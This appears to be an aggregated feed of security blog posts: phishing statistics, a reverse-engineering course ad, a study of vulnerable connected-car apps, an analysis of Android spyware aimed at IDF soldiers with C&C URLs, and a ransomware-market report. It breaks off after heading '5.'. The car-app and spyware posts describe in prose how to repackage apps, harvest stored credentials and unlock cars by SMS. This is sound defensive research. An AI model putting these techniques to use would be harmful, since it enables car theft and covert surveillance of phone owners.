    This way the user does not know that they have received a phishing email, while the bank does not receive a phishing domain in its referrers. At the same time, the phishers get confirmation that the user clicked on the link, which means that in future they will be able to send them more phishing emails, for example, in order to steal credit card data. In this way, the attackers ‘cleanse’ their databases of unused email addresses and vigilant recipients. They also detect clients of the bank whose name was used in the emails, allowing them to make their mass mailings more targeted.

    The geography of attacks Top 10 countries by percentage of attacked users

    Brazil had the highest proportion of users subjected to phishing attacks (27.61%), a 5.98 p.p. increase on the previous year.

    The percentage of users on whose computers the Anti-Phishing system was triggered out of the total number of Kaspersky Lab users in the country, 2016

    In Brazil, we see lots of attacks targeting users of banks and online stores, so it is not surprising that the country often leads in the rating of countries with the highest proportion of users subjected to phishing attacks.

    Phishers often place fake pages on the servers of government bodies in Brazil. This is one of the methods used to prevent phishing URLs from ending up on blacklists. It also enhances the credibility in the eyes of the victim. In 2016, we registered 1,043 such cases.

    Fake page on the domain

    Top 10 countries by percentage of attacked users

    Country % Brazil 27.61 China 22.84 Australia 20.07 Japan 19.16 Algeria 17.82 Russia 17.16 United Kingdom 16.64 Canada 16.03 United Arab Emirates 15.54 Saudi Arabia 15.39

    China was second in this rating (22.84%). It didn’t make the Top 10 in 2015, but added 5.87 p.p. to its share in 2016. Australia (20.07%), which was seventh last year, came third following an increase of 2.39 p.p. Apart from Saudi Arabia (+ 4.9 p.p.), the shares of the other Top 10 countries barely changed.

    The distribution of attacks by country

    Russia (16.12%, +1.68 p.p.) topped the rating of countries where the Anti-Phishing system was trigged most often (out of the total number of the Anti-Phishing system detections around the world in 2016)

    Distribution of Anti-Phishing system component detections by country, 2016

    As in 2015, Brazil (8.77%) came second behind Russia, although its growth was negligible. The US added 0.5 p.p. (8.01%), which was enough to push India (6.01%) down to fourth. The top five also included China (7.86%).

    Organizations under attack

    The statistics on organizations used in phishing attacks are based on the triggering of the heuristic component in the Anti-Phishing system. The heuristic component is triggered when a user tries to follow a link to a phishing page and there is no information about the page in Kaspersky Lab’s databases.

    Organizations under attack by category

    In the second half of 2016, the proportion of phishing attacks targeting customers of financial institutions increased significantly (44.16% in the first quarter vs 48.14% in Q4). We have been following this growth over the last few years: in 2014, the average figure for the year was 28.74%; in 2015, it was 34.33%; and it was 47.47% in 2016.

    In 2016, we saw significant growth in the proportion of phishing attacks on organizations belonging to the ‘Banks’ category (25.76%, + 8.31 p.p.). Of particular note was the increase in the percentage of targeted organizations in the ‘Online stores’ (10.17%, +1.09 p.p.) and ‘Payment systems’ (11.55%, +3.75 p.p.) categories.

    Distribution of organizations subject to phishing attacks by category, 2016

    At the same time, the share of the main categories decreased. For instance, the ‘Global Internet portals’ category (24.10%) lost 7.77 p.p. while the share of ‘Social networking sites’ (10.91%) fell by 5.49 p.p.

    Overall, the priorities of the phishing scammers have not changed over the years. Attacks primarily exploit the names of popular brands, whose clients are numerous and likely to bring maximum financial profit.

    Another priority is attacks that could lead to the acquisition of confidential information and, subsequently, money. For example, some portals from the ‘Global Internet portals’ category (Google, Yahoo!, Microsoft (, etc.) use the same account to access multiple services. A successful phishing campaign can therefore give fraudsters access to several of the victim’s accounts.

    Phishing page to attack Google users

    Top 3 attacked organizations

    Organization % of detected phishing links Yahoo! 7.84 Facebook 7.13 Microsoft Corporation 6.98

    Yahoo! (7.84%) again topped the ranking of organizations used by fraudsters to mask their attacks, although the proportion of Anti-Phishing system detections of fake pages mentioning this brand declined considerably in 2016 – by 6.86 p.p. (vs 10 p.p. in 2015). It is clear that the company is actively fighting phishing attacks, for example, by registering obfuscated domains in its own name (,,,,, However, phishers often place their content on legitimate sites (without the owners being aware of it) rather than create phishing domains.

    Example of a web page using the Yahoo! brand

    Second in popularity with the fraudsters was Facebook (7.13%). Over the year its share decreased by 2.38 p.p.

    In 2016, we came across both classic phishing pages imitating the Facebook login page and various pages designed to steal data. One popular way of luring a victim is to promise them access to age-restricted content after entering their username and password, i.e., logging in to the system.

    To increase the chances of hitting their target, mass phishing campaigns use the names of the most popular brands. Since these brands are often international, the attacks target users around the world. Naturally, phishing messages are written in many languages. One phisher trick was described in our report Spam and phishing in Q3 2016. By using information about the IP address of a potential victim, phishers determine the country in which they are located. Cybercriminals will then display pages in the language of the country that is identified.

    Third place in our Top 3 was occupied by Microsoft (6.98%). Using this brand to hide their attacks, fraudsters often try to steal data from user accounts on the portal. They tend to use pages imitating the login page of the company’s email service.

    There are also other schemes, such as simulation of account verification:

    Conclusions and forecasts

    2016 saw a variety of changes in spam flows, with the increase in the number of malicious mass mailings containing ransomware being the most significant. These programs are readily available on the black market, and in 2017 the volume of malicious spam is unlikely to fall.

    Spam became very popular with small and medium businesses in China in 2016. One possible reason for this is the Great Firewall of China, which makes it difficult for Chinese businesses to use legal international platforms for advertising.

    Of all the techniques used by spammers in 2016, the various ways of adding noise to text and links with the help of HTML capabilities are worth noting. This is nothing new, but spammers are constantly coming up with new types of obfuscation, and they will obviously continue to do so in the future.

    The proportion of spam in email traffic was 58.31%, which is 3.03 p.p. higher than 2015. This was the first registered growth since 2009 – this was partially down to the surge in malicious spam.

    For several years in a row, the number of fraudulent schemes targeting clients of financial institutions has been increasing, and we expect this trend to continue. The attacks are becoming more versatile: the fraudulent pages adapt to the user and display information in the local language as well as other relevant data.

    The methods for distributing fraudulent pages have gone far beyond the scope of email. Cybercriminals are using all available means to contact potential victims: text messages, advertising or social networks. The latter are not only a good channel of communication but also a useful resource helping intruders gather information to carry out a more effective attack on users.

Dissecting Malware

Malware Alerts - Fri, 02/17/2017 - 04:55

Four-day course on reverse engineering

There are just a handful of reverse engineers clustered at the very top of the information security profession. From March 30 through April 2, 2017, one of them — Principal Security Researcher at Kaspersky Lab Nicolas Brulez — will deliver a course on the subject he has been training people around the world on for 12 years, malware reverse engineering. You won’t be stumped for days on end by reversing challenges anymore, because you’ll take away from St. Maarten tricks and efficient moves to reverse faster.

At Kaspersky Lab’s SAS 2017, those who are trying to break into the next level of digital investigation and malware analysis will benefit greatly — the SAS team has prepared three dedicated courses. Students will find out how to hunt for rare samples, study link analysis to see hidden connections, and learn reverse engineering techniques to see how the malicious code actually works.

You can take advantage of these “surgical” studies if you’re a practitioner of malware research, do forensics or incident response, or deal with reversing in general. You need to know assembly language and how to use tools such as debuggers and disassemblers (IDA). If you were analyzing code 10 years ago, you’ll find it easy to jump back into reversing. The good thing about it is that the tools and techniques remain almost the same, so reverse engineers just have to adapt a little bit to new technologies. Join the training to make sure that the world hasn’t turn upside down while you were chilling.

Journey to the inside of famous malware

Each day the students will practice reverse engineering skills on samples from such malicious programs as Cloud Atlas, MiniDuke or Red October that can be applied to modern analysis. The course program will help you develop the following skills:

Unpacking malware manually

Packers have been around for more than 10 years. In all this time they have had just one aim: making malware analysis more difficult and time-consuming. As it is time which is crucially important for a researcher, unpacking samples quickly is the goal of Day 1 of the training. Be ready to unpack some of the “celebrities” of the malware universe.

Actual malware analysis

After Day 2 you will be able to perform static shell code analysis using IDA as if you had never stopped doing it. You quickly take code from one sample hashing algorithm and easily re-implement it. Other exercises are included too, such as analyzing MiniDuke, which is written in machine assembly language and has an extremely small and unsuspicious file size.

Dissecting APTs

The last two days gives you the chance to practice what you learned in the first two days. You will define the components of malware and observe its functions, investigating the way it communicates with C&C servers. Only an understanding of how malware works will allow an IT security expert to stop the infection.

Hardware requirements
  • Legitimate version of IDA Pro
  • Virtual Machine with Windows XP SP3 installed (to avoid compatibility issues)
  • OllyDbg
  • Python 2.7
  • PE Editor (e.g. LordPE or other)
  • Hex Editor (e.g. Hiew or other)
  • Import Reconstructor/fixer: Imprec, Universal Import Fixer 1.2
  • PEID

The class is limited to a maximum of 20 participants — so book a seat at to be sure you are on the list.

Mobile apps and stealing a connected car

Malware Alerts - Thu, 02/16/2017 - 17:27

The concept of a connected car, or a car equipped with Internet access, has been gaining popularity for the last several years. The case in point is not only multimedia systems (music, maps, and films are available on-board in modern luxury cars) but also car key systems in both literal and figurative senses. By using proprietary mobile apps, it is possible to get the GPS coordinates of a car, trace its route, open its doors, start its engine, and turn on its auxiliary devices. On the one hand, these are absolutely useful features used by millions of people, but on the other hand, if a car thief were to gain access to the mobile device that belongs to a victim that has the app installed, then would car theft not become a mere trifle?

In pursuing the answer to this question, we decided to figure out what an evildoer can do and how car owners can avoid possible predicaments related to this issue.

Potential Threats

It should be noted that car-controlling apps are quite popular – most popular brands release apps whose number of users is between several tens of thousands and several million people. As an example, below are several apps listed with their total number of installations.

For our experiments, we took several apps that control cars from various manufacturers. We will not disclose the app titles, but we should note that we notified the manufacturers of our findings throughout our research.

We reviewed the following aspects of each app:

  • Availability of potentially dangerous features, which basically means whether it is possible to steal a car or incapacitate one of its systems by using the app;
  • Whether the developers of an app employed means to complicate reverse engineering of the app (obfuscation or packing). If not, then it won’t be hard for an evildoer to read the app code, find its vulnerabilities, and take advantage of them to get through to the car’s infrastructure;
  • Whether the app checks for root permissions on the device (including subsequent canceled installations in case the permissions have been enabled). After all, if malware manages to infect a rooted device, then the malware will be capable of doing virtually anything. In this case, it is important to find out if developers programmed user credentials to be saved on the device as plain text;
  • Whether there is verification that it is the GUI of the app that is displayed to the user (overlay protection). Android allows for monitoring of which app is displayed to the user, and a malware can intercept this event by showing a phishing window with an identical GUI to the user and steal, for instance, the user’s credentials;
  • Availability of an integrity check in the app, i.e., whether it verifies itself for changes within its code or not. This affects, for example, the ability of a malefactor to inject his code into the app and then publish it in the app store, keeping the same functionality and features of the original app.

Unfortunately, all of the apps turned out to be vulnerable to attacks in one way or another.

Testing the Car Apps

For this study, we took seven of the most popular apps from well-known brands and tested the apps for vulnerabilities that can be used by malefactors to gain access to a car’s infrastructure.

The results of the test are shown in the summary table below. Additionally, we reviewed the security features of each of the apps.

App App features App code obfuscation Unencrypted username and password Overlay protection for app window Detection of root permissions App integrity check App #1 Door unlock No Yes (login) No No No App #2 Door unlock No Yes (login & password) No No No App #3 Door unlock; engine start No – No No No App #4 Door unlock No Yes (login) No No No App #5 Door unlock; engine start No Yes (login) No No No App #6 Door unlock; engine start No Yes (login) No No No App #7 Door unlock; engine start No Yes (login & password) No No No App #1

The whole car registration process boils down to entering a user login and password as well as the car’s VIN into the app. Afterwards, the app shows a PIN that has to be entered with conventional methods inside the car so as to finalize the procedure of linking the smartphone to the car. This means that knowing the VIN is not enough to unlock the doors of the car.

The app does not check if the device is rooted and stores the username for the service along with the VIN of the car in the accounts.xml file as plain text. If a Trojan has superuser access on the linked smartphone, then stealing the data will be quite easy.

App #1 can be easily decompiled, and the code can be read and understood. Besides that, it does not counter the overlapping of its own GUI, which means that a username and password can be obtained by a phishing app whose code may have only 50 lines. It should be enough to check which app is currently running and launch a malicious Activity with a similar GUI if the app has a target package name.

In order to check for integrity verification, we modified the loginWithCredentials method.

In this case, a username and password will simply be shown on the screen of a smartphone, but nothing prevents embedding a code to send credentials to a criminal’s server.

The absence of integrity verification allows any interested individual to take the app, modify it at his own discretion, and begin distributing it among potential victims. Signature verification is sorely lacking. There is no doubt that such an attack will require an evildoer to make some effort – a user has to be conned into downloading the modified version of the app. Despite that, the attack is quite surreptitious in nature, so the user will not notice anything out of the ordinary until his car has been stolen.

What is nice, however, is that the app pulls SSL certificates to create a connection. All in all, this is reasonable enough, as this prevents man-in-the-middle attacks.

App #2

The app offers to save user credentials but at the same time recommends encrypting the whole device as a precaution against theft. This is fair enough, but we are not going to steal the phone – we are just “infecting” it. As a result, there is the same trouble as found in App #1: the username and password are stored as plain text in the prefs file.{?????????}.xml file (the question marks represent random characters generated by the app).

The VIN is stored in the next file.

The farther we go, the more we get. The developers did not even find time to implement integrity verification of the app code, and, for some reason, they also forgot about obfuscation. As a consequence of that, we easily managed to modify the LoginActivity code.

Thus, the app preserved its own functionality. However, the username and password that had been entered during registration were displayed on the screen immediately after a login attempt.

App #3

Cars paired to this app are optionally supplied with a control module that can start the engine and unlock the doors. Every module installed by the dealer has a sticker with an access code, which is handed over to the car owner. This is why it is not possible to link the car to other credentials, even if its VIN is known.

Still, there are other attack possibilities: first, the app is tiny, as its APK size amounts to 180 kilobytes; secondly, the entire app logs its debugging data onto a file, which is saved on an SD card.

Logging at the start of LoginActivity

The location for dumping the log file

It’s a bit of bad luck that logging is enabled only when the following flag is set up in the app: android:debuggable=”true”. The public version of the app does not have the flag for obvious reasons, but nothing can stop us from inserting it into the app. To do that, we shall use the Apktool utility. After launching the edited app and attempting to log in, the SD card of the device will create a marcsApp folder with a TXT file. In our case, the username and password of the account have been output into the file.

Of course, persuading the victim to remove the original app and install an identical one with the debugging flag is not that easy. Nevertheless, this shuffling can be performed, for example, by luring the victim to a website where the edited app and installation manual can be downloaded as a critical update. Empirically, virus writers are good at employing social engineering methods such as this one. Now, it isn’t a big deal to add to the app the ability to send a log file to a designated server or a phone number as an SMS message.

App #4

The app allows binding of the existing VIN to any credentials, but the service will certainly send a request to the in-dash computer of the car. Therefore, unsophisticated VIN theft will not be conducive to hacking the car.

However, the tested app is defenseless against overlays on its window. If, owing to that, an evildoer obtains the username and password for the system, then he will be able to unlock the doors of the car.

Regretfully enough, the app stores the username for the system as well as a plethora of other interesting data, such as the car’s make, the VIN, and the car’s number, as clear text. All of these are located in the MyCachingStrategy.xml file.

App #5

In order to link a car to a smartphone that has the app installed, it is necessary to know the PIN that will be displayed by the in-dash computer of the car. This means that, just like in the case with the previous app, knowing the VIN is not enough; the car must be accessed from the inside.

App #6

This is an app made by Russian developers, which is conceptually different from its counterparts in that the car owner’s phone number is used as authorization. This approach creates a fair degree of risk for any car owner: to initiate an attack, just one Android API function has to be executed to gain possession of the username for the system.

App #7

For the last app that we reviewed, it must be noted that the username and password are stored as plain text in the credentials.xml file.

If a smartphone is successfully infected with a Trojan that has superuser permissions, then nothing will hinder the effortless theft of this file.

Opportunities for Car Theft

Theoretically, after stealing credentials, an evildoer will be able to gain control of the car, but this does not mean that the criminal is capable of simply driving off with it. The thing is, a key is needed for a car in order for it to start moving. Therefore, after accessing the inside of a car, car thieves use a programming unit to write a new key into the car’s on-board system. Now, let us recall that almost all of the described apps allow for the doors to be unlocked, that is, deactivation of the car’s alarm system. Thus, an evildoer can covertly and quickly perform all of the actions in order to steal a car without breaking or drilling anything.

Also, the risks should not be limited to mere car theft. Accessing the car and deliberate tampering with its elements may lead to road accidents, injuries, or death.

None of the reviewed apps have defense mechanisms. Due credit should be given to the app developers though: it is a very good thing that not a single of the aforementioned cases uses voice or SMS channels to control a car. Nonetheless, these exact methods are used by aftermarket alarm-system manufacturers, including Russian ones. On the one hand, this fact does not come as a surprise, as the quality of the mobile Internet does not always allow cars to stay connected everywhere, while voice calls and SMS messages are always available, since they are basic functions. On the other hand, this creates supernumerary car security threats, which we will now review.

Voice control is handled with so-called DTMF commands. The owner literally has to call up the car, and the alarm system responds to the incoming call with a pleasant female voice, reports the car status, and then switches to standby mode, where the system waits for commands from the owner. Then, it is enough to dial preset numbers on the keypad of the phone to command the car to unlock the doors and start the engine. The alarm system recognizes those codes and executes the proper command.

Developers of such systems have taken care of security by providing a whitelist for phone numbers that have permission to control the car. However, nobody imagined a situation where the phone of the owner is compromised. This means that it is enough for a malefactor to infect the smartphone of a victim with an unsophisticated app that calls up the alarm system on behalf of the victim. If the speakers and screen are disabled at the same time, then it is possible to take full command of the car, unbeknownst to the victim.

Certainly though, not everything is as simple as it seems at first glance. For example, many car enthusiasts save the alarm-system number under a made-up name, i.e. a successful attack necessitates frequent interaction of the victim with the car via calls. Only this way can an evildoer that has stolen the history of outgoing calls find the car number in the victim’s contacts.

The developers of another control method for the car alarm system certainly have read none of our articles on the security of Android devices, as the car is operated through SMS commands. The thing is, the first and most common mobile Trojans that Kaspersky Lab faced were SMS Trojans, or malware that contains code for sending SMS surreptitiously, which was done through common Trojan operation as well as by a remote command issued by malefactors. As a result, the doors of a victim’s car can be unlocked if malware developers perform the following three steps:

  1. Go through all of the SMS messages on the smartphone to look for car commands.
  2. If the needed SMS messages have been located, then extract the phone number and password from them in order to gain access.
  3. Send an SMS message to the discovered number that unlocks the car’s doors.

All of these three steps can be done by a Trojan while its victim suspects nothing. The only thing that needs to be done, which malefactors are certainly capable of handling, is to infect the smartphone.


Being an expensive thing, a car requires an approach to security that is no less meticulous than that of a bank account. The attitude of car manufacturers and developers is clear: they strive to fill the market quickly with apps that have new features to provide quality-of-life changes to car owners. Yet, when thinking about the security of a connected car, its infrastructure safety (for control servers) and its interaction and infrastructure channels are not the only things worth considering. It’s also worth it to pay attention to the client side, particularly to the app that is installed on user devices. It is too easy to turn the app against the car owner nowadays, and currently the client side is quite possibly the most vulnerable spot that can be targeted by malefactors.

At this point, it should be noted that we have not witnessed a single attack on an app that controls cars, and none of the thousands of instances of our malware detection contain a code for downloading the configuration files of such apps. However, contemporary Trojans are quite flexible: if one of these Trojans shows a persistent ad today (which cannot be removed by the user himself), then tomorrow it can upload a configuration file from a car app to a command-and-control server at the request of criminals. The Trojan could also delete the configuration file and override it with a modified one. As soon as all of this becomes financially viable for evildoers, new capabilities will soon arrive for even the most common mobile Trojans.

Breaking The Weakest Link Of The Strongest Chain

Malware Alerts - Thu, 02/16/2017 - 04:54

Around July last year, more than a 100 Israeli servicemen were hit by a cunning threat actor. The attack compromised their devices and exfiltrated data to the attackers’ command and control server. In addition, the compromised devices were pushed Trojan updates, which allowed the attackers to extend their capabilities. The operation remains active at the time of writing this post, with attacks reported as recently as February 2017.

The campaign, which experts believe is still in its early stages, targets Android OS devices. Once the device is compromised, a process of sophisticated intelligence gathering starts, exploiting the ability to access the phone’s video and audio capabilities, SMS functions and location.

The campaign relies heavily on social engineering techniques, leveraging social networks to lure targeted soldiers into both sharing confidential information and downloading the malicious applications.

Characterized by relatively unsophisticated technical merit, and extensive use of social engineering, the threat actor targets only IDF soldiers.

IDF C4I & the IDF Information Security Department unit, with Kaspersky Lab researchers, have obtained a list of the victims; among them IDF servicemen of different ranks, most of them serving around the Gaza strip.

Attack Flow

The operation follows the same infection flow across the different victims:

Figure 1: Campaign’s attack flow

Social Engineering

The threat actor uses social engineering to lure targets into installing a malicious application, while continuously attempting to acquire confidential information using social networks. We’ve seen a lot of the group’s activity on Facebook Messenger. Most of the avatars (virtual participants in the social engineering stage) lure the victims using sexual innuendo, e.g. asking the victim to send explicit photos, and in return sending fake photos of teenage girls. The avatars pretend to be from different countries such as Canada, Germany, Switzerland and more.


After the victim downloads the APK file from the malicious URL, the attacker expects the victim to install the package manually. The dropper requires common user permissions as shown in the following screenshot.

Figure 2: Dropper permissions once installed on a victim mobile device

Key features

The dropper relies on the configuration server which uses queries in order to download the best fitting payload for the specified device.

  • Downloader & Watchdog of the main payload
  • Payload update mechanism
  • Customized payload – the dropper sends a list of installed apps, and receives a payload package based on it
  • Obfuscation – The dropper package is obfuscated using ProGuard, which is an open source code obfuscator and Java optimizer, observed in the LoveSongs dropper.
Network Protocols

The network protocol between the dropper and the configuration server is based on HTTP POST requests. The following servers implement a RESTful API:

LoveSongs – http://endpointup[.]com/update/upfolder/updatefun.php

YeeCall, WowoMessanger – http://droidback[.]com/pockemon/squirtle/functions.php

Figure 3: Communication with C&C server over HTTP

Most of the communication with the server is in clear-text, except for specific commands which are encrypted using an AES-128 hard coded-key.

Figure 4: WowoMessanger REST-API POST packet capture

Figure 5: Fake WowoMessanger app – logic flow

Along with an ID existence check, the dropper sends a list of the device’s installed apps – if it hasn’t done so already.

The flow between different variants of the dropper is similar, with minor changes. One variant pretends to be a YouTube player, while others are chat apps:

LoveSongs has YouTube player functionality, whereas WowoMessanger does not have any legitimate functionality whatsoever; it erases its icon after the first run.


The payload is installed after one of the droppers mentioned above has been downloaded and executed on the victim device. The only payload we have seen so far is “WhatsApp_Update”.

The payload is capable of two collection mechanisms:

  • Execute “On demand” commands – manual commands that are triggered by the operator
  • Scheduled process – scheduled tasks that collect information periodically from various sources.

Most of the collected data will be sent only when a WI-FI network is available.

C&C Commands

The payload uses the WebSocket protocol, which gives the attacker a real-time interface to send commands to the payload in a way that resembles ‘reverse shell’. Some of the commands are not yet implemented (as shown in the table below). The commands gives the operator basic yet dangerous RAT capabilities:

  • Collect general information about the device e.g. Network operator, GPS location, IMEI etc.
  • Open a browser and browse to a chosen URL
  • Read & send SMS messages, and access contacts
  • Eavesdrop at a specific time and period
  • Take pictures (using the camera) or screenshots
  • Record video and audio.

*Commands which were implemented are in bold.

Scheduled Process

Besides the C&C commands, the payload periodically collects data using various Android APIs. The default time interval is 30 seconds. The process collects the following data:

  • General data about the device (as mentioned in the C&C command)
  • SMS messages, WhatsApp database along with the encryption key (requires root permissions which is not yet fully implemented)
  • Browsing & search history along with bookmarks
  • Documents and archives ( < 2MB ) found in storage (doc, docx, ppt, rar, etc)
  • Pictures taken, auto captures while on an active call
  • List of contacts and call logs
  • Records calls and eavesdrops
  • Updates itself

The attackers implemented all of the malicious logic without any native or third-party sources. The logic behind the automatic call-recording feature is implemented entirely using Android’s API.

Figure 6: Call-Recording implementation in WhatsApp_update


The IDF, which led the research along with Kaspersky Lab researchers, has concluded that this is only the opening shot of this operation. Further, that it is by definition a targeted attack against the Israeli Defense Force, aiming to exfiltrate data on how ground forces are spread, which tactics and equipment the IDF is using and real-time intelligence gathering.

Kaspersky Lab GReAT researchers will disclose more behind-the-scenes details of the operation at the upcoming Security Analyst Summit.

IOCs Domain names & APK hashes


Certificates – SHA1 fingerprints


Forwarding Emails

SANS Tip of the Day - Wed, 02/15/2017 - 00:00
When you forward an email to others or copy new people to an email thread, review all the content in the entire email and make sure the information contained in it is suitable for everyone. It is very easy to forward emails to others, not realizing there is highly sensitive information in the bottom of the email that people should not have access to.

A look into the Russian-speaking ransomware ecosystem

Malware Alerts - Mon, 02/13/2017 - 19:41

It is no secret that encryption ransomware is one of the key malware problems today, for both consumers and corporate users. While analyzing the attack statistics for 2016, we discovered that by the end of the year a regular user was attacked with encryption ransomware on average every 10 seconds, with an organization somewhere in the world hit around every 40 seconds.

Kaspersky Lab statistics on the ransomware threat in 2016

In total we’ve registered attacks using encryption ransomware against 1,445,434 users worldwide. Between them, these people were attacked by 54 thousand modifications of 60+ families of crypto ransomware.

So why is this happening now if encryption ransomware, as a type of malware, has existed since the mid-2000s? There are three main reasons:

  • It’s easy to buy a ransomware build or builder on the underground market
  • It’s easy to buy a distribution service
  • Crypto ransomware, as a business, has a very clear monetization model through cryptocurrencies

In other words, this is a fine tuned, user friendly and constantly developing ecosystem. In the last few years we, at Kaspersky Lab, have been monitoring the development of this ecosystem. This is what we’ve learned.

1. In most cases crypto ransomware has a Russian origin

One of the findings of our research is that 47 of the 60+ crypto ransomware families we’ve discovered in the last 12 months are related to Russian-speaking groups or individuals. This conclusion is based on our observation of underground forums, command and control infrastructure, and other artefacts which can be found on the web. It is hard to draw strong conclusions on why so many of the ransomware families out there have a Russian origin, but it is safe to say that this is because there are a lot of well-educated and skilled code writers in Russia and its neighboring countries.

Another possible reason is that the Russian cybercriminal underground has the richest background when it comes to ransomware schemes. Prior to the current crypto ransomware wave, there was another ransomware-themed malware epidemic. Between approximately 2009 and 2011, thousands of users in Russia and its neighboring countries experienced attacks which used so-called Windows- or browser-lockers. This type of ransomware blocks the user’s access to their browser or OS and then demands a ransom in exchange for unlocking access. The epidemic withered for a number of reasons: law enforcement agencies responded adequately and caught several criminals involved in the business; mobile operators made the process of withdrawing money through premium SMS services harder; and the security industry invested a lot of resources into developing free unlocking services and technologies.

But it seems that experienced ransomware criminals haven’t disappeared, they’ve just been waiting for a new monetization model, which has now emerged in the form of crypto currencies. This time though, the ransomware problem is not specifically Russian, but global.

2. There are three types of involvement in the ransomware “business”

The Russian underground crypto ransomware market currently offers criminals three different ways of entering the illegal business.

  • Create new ransomware for sale
  • Become a partner in a ransomware affiliate program
  • Become the owner of an affiliate program

The first type of involvement requires advanced code writing skills, including a deep knowledge of cryptography. The actors which we have observed in this category are like gun traders: they usually don’t participate in actual attacks, but only sell code.

An example of an advertisement selling unique crypto malware, posted by its creator. The author promises encryption with Blowfish and RSA-2048 algorithms, anti-emulation techniques, advanced scanning capabilities, and functions allowing for the removal of backups and shadow copies of the information stored on the victim’s PC.

Sometimes, authors of the malware sell their “products” with all the source code for a fixed price (usually several thousand dollars) and sometimes they sell their builder – the tool which allows criminals with no programming background to build the crypto ransomware with a specific list of functions.

The following illustration provides hints as to what capabilities a builder gives to a criminal. For example, it allows criminals to create ransomware which will start encrypting files only after 10 minutes of user inactivity; which will change the extensions of encrypted files to one of the criminals’ choice; and which will request administrator privileges until it receives it. It also allows criminals to change desktop wallpapers to arbitrary ones, and to implement some other features that in the end can be combined into a very dangerous piece of software.

The interface of the Glove ransomware builder

Builders are usually much cheaper than the full source code of unique ransomware – hundreds of dollars. However, authors (and owners) of software like this often charge customers for each new build of malware created with help of their software.

Pay-per-build is another type of monetization used by the authors of the original ransomware. In this case the price drops even lower, to tens of dollars, but the client would receive the malware with a fixed list of functions.

An advertisement offering unique crypto ransomware with a pay-per-build model

The build often includes not only the malware code itself, but also tools for statistics and interaction with infected PCs.

An example of a command and control panel which comes with the build of a certain ransomware family

Affiliate programs, the third type of involvement in the ransomware criminal business, is a rather standard form of cybercrime: owners of the program provide partners with all the necessary infection tools, and then the partners work on distributing the malware. The more successful their efforts, the more money they receive. Participation in such programs requires nothing but the will to conduct certain illegal activities and couple of bitcoins as a partnership fee.

An advertisement for an affiliate program

Interestingly, while researching the development of the underground ransomware ecosystem, we discovered two types of affiliate programs: one for all, and one for specific partners.

Unlike the programs for everyone, “elite” programs won’t accept just any kind of partner. In order to become a partner in an elite program, a candidate has to provide a personal recommendation from one of the acting partners in the program. Besides that, the candidate must prove that they have certain malware distribution capabilities. In one case we observed in the last year, the candidate had to demonstrate their ability to complete at least 4000 successful downloads and installations of the malware on victim PCs. In exchange, the partner gets some free tools for the obfuscation of ransomware builds (in order to make them less visible to security solutions) and a good conversion rate – up to 3%, which is a very good deal, at least compared to rates that legal affiliate programs offer.

To summarize all that is written above: flexibility is the key feature of the current underground ransomware ecosystem. It offers lots of opportunities to people with a propensity towards criminal behavior, and it almost doesn’t matter what level of IT experience they have.

3. There are some really big players on this market

If you think that being the owner or a partner of an “elite” affiliate program is the highest possible career milestone in the world of ransomware, you are mistaken. In reality, ransomware creators, their stand-alone clients, partners and owners of affiliate programs are often working for a bigger criminal enterprise.

The structure of a professional ransomware group contains the malware writer (aka the creator of the group), affiliate program owners, partners of the program, and the manager who connects them all into one invisible enterprise

There are currently several relatively large ransomware groups with Russian-speaking participants out there. In the last few months we’ve been researching the operation of one such group and now have an understanding of how it operates. We consider this group an interesting one, because it is built in a way that made it really hard for us to identify all its affiliates. It consists of the following parties: The creator, the manager, the partners, and affiliate programs. According to our intelligence the creator and the leader of this group is the ransomware author. He developed the original ransomware, additional modules for it and the IT infrastructure to support the malware operation. The main task of the manager is to search for new partners and support existing ones. According to our knowledge, the manager is the only person who interacts with the creator. The primary task of partners is to pick up the new version of ransomware and distribute it successfully. This means successfully infecting as many PCs as possible and demanding a ransom. For this – among other tools – partners utilize the affiliate programs which they own. The creator earns money by selling exclusive malware and updates to the partners, and all the other participants of the scheme share the income from the victims in different proportions. According to our intelligence, there are at least 30 partners in this group.

4. Costs and profits on the underground ransomware market are high

We estimate that the revenue of a group like the one described above could reach as much as thousands of dollars a day in successfully demanded ransom payments. Although, of course, as with any other type of malicious activity at a professional level, the professional ransomware player spends a lot on resources in order to create, distribute and monetize the malicious code.

The structure of the operating cost of a large ransomware group more or less looks like the following:

  1. Ransomware modules update
    1. New features
    2. Bypass techniques
    3. Encryption improvement
  2. Distribution (spam/exploit kits)
  3. AV check service
  4. Credentials for hacked servers
  5. Salary for hired professionals (usually these are IT administrators who support the server infrastructure)

The core of the whole group’s mechanics is ransomware code and the distribution channels.

They distribute ransomware in four main ways: exploit kits, spam campaigns, social engineering, hacked dedicated servers, and targeted hacks. Exploit kits are one of the most expensive types of distribution tool and could cost several thousand dollars per week, but, on the other hand, this type of distribution is one of the most effective in terms of the percentage of successful installations.

Spam emailing is the second most popular form of distribution. Spear phishing emails sent by criminals are usually disguised as an important message from a government organization or large bank, with a malicious attachment. According to what we’ve observed in the last year, spamming targets with malicious emails is a more than workable method, because in 2016 the amount of ransomware-related malicious spam blocked by our systems was enormous.

And sometimes the emails that the targets of ransomware hackers receive are technically legit. While working on incident response we’ve observed several instances where an email with a malicious attachment (which in the end encrypted important victim data) was sent out from a legitimate email, by a legitimate user. Very often, these are emails from clients or partners of an attacked organization, and after digging deeper and talking to representatives of the organization which sent the malicious emails, we learned that that organization was infected as well.

How criminals use one infected organization to attack another

It appeared to us that the ransomware criminals initially infected one organization, then got access to its email system and started sending out emails with a malicious attachment to the whole company’s contact list. It is hard to underestimate the danger of this form of ransomware distribution: even if the recipient of an email like this is aware of the main methods used by cybercriminals use to distribute malware, there is no way for him/ her to identify the attack.

As we’ve learned, the operating costs that ransomware criminals face to support their campaigns may amount to tens of thousands dollars in some cases. Even so, this business is unfortunately extremely profitable. Based on what we’ve seen in conversations on underground forums, criminals are lining their pockets with nearly 60% of the revenue received as a result of their activities. So, let’s go back to our estimate of the daily revenue of a group, which may be tens of thousands of dollars on a good day.

The typical distribution of profit (green) vs. operating costs (red) in a ransomware business

That’s of course an estimate of cumulative net income: the total sum of money which is used as payoffs to all the participants of the malicious scheme – starting from regular affiliate program members and ending with the elite partners, manager and the creator. Still, this is a huge amount of money. According to our observations, an elite partner generally earns 40-50 bitcoins per month. In one case we’ve seen clues that an especially lucky partner earned around 85 bitcoins in one month, which, according to the current bitcoin exchange rate, equals $85,000 dollars.

5. Professional ransomware groups are shifting to targeted attacks

